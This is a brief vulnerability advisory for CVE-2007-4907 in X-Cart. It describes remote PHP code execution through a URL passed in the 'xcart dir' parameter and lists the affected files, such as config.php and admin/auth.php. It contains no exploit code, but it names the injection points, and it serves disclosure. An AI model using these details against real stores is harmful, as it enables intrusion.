Qualiteam · X-Cart · CVE-2007-4907
Name of the Vulnerable Software and Affected Versions:
X-Cart (affected versions not specified)
Description:
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `xcart dir` parameter to various PHP files, including `config.php`, `prepare.php`, `smarty.php`, `customer/product.php`, `provider/auth.php`, and `admin/auth.php`.
Recommendations:
At the moment, there is no information about a newer version that contains a fix for this vulnerability.